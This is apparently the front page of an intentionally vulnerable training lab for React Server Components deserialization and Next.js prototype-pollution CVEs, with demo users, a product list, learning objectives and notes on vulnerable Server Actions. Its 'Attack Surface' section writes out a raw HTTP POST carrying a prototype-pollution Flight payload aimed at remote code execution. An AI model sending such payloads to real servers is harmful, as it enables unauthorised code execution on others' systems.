Vulnerable Lab - CVE-2025-55182 & CVE-2025-66478

🔬 Lab Information

Vulnerability Details

CVE-2025-55182: React Server Components - Insecure Deserialization
CVE-2025-66478: Next.js - Prototype Pollution in requireModule
CVSS Score: 10.0 (Critical)
Attack Vector: Network (No authentication required)

Server Information (Exposed via RSC)

{
  "hostname": "localhost",
  "nodeVersion": "v20.19.6",
  "platform": "linux"
}

📡 React Server Components Demo

These components use the RSC Flight protocol - the vulnerable deserialization mechanism

👥 Server-Side User Data (RSC)

This data is fetched and rendered on the server, then streamed via Flight protocol

ID	Name	Email	Role
1	Admin User	admin@vulnerable-lab.local	administrator
2	Regular User	user@vulnerable-lab.local	user

🛒 Product Catalog (Server Component)

Products loaded server-side. Form submissions use Server Actions (also vulnerable)

Security Scanner Pro

ID: PROD-001

$299.99

In Stock

Vulnerability Assessment Tool

ID: PROD-002

$599.99

In Stock

Penetration Testing Suite

ID: PROD-003

$999.99

Out of Stock

Network Monitor

ID: PROD-004

$199.99

In Stock

⚠️ Server Action Vulnerability:

The form above uses a Server Action. When submitted, the data is serialized using the Flight protocol and sent to the server for processing. This deserialization point is vulnerable to CVE-2025-55182.

⚠️ Vulnerability Demonstration Points

RSC Payload Endpoint:/_next/static/chunks/app/page.js
Flight Protocol Stream: The RSC responses contain serialized React components
Deserialization Point: Server deserializes client-sent Flight payloads without proper validation
Prototype Pollution: requireModule function doesn't check for __proto__ access

🎯 Attack Surface

Send malicious Flight payload to trigger RCE:

POST / HTTP/1.1
Content-Type: text/x-component

0:["$","$L1",null,{"__proto__":{"constructor":{"prototype":{"env":{"NODE_OPTIONS":"--require /proc/self/environ"}}}}}]

📚 Learning Objectives

Understand React Server Components (RSC) architecture
Learn about the Flight protocol and its serialization mechanism
Identify insecure deserialization vulnerabilities
Understand prototype pollution attacks in JavaScript
Practice detection and mitigation techniques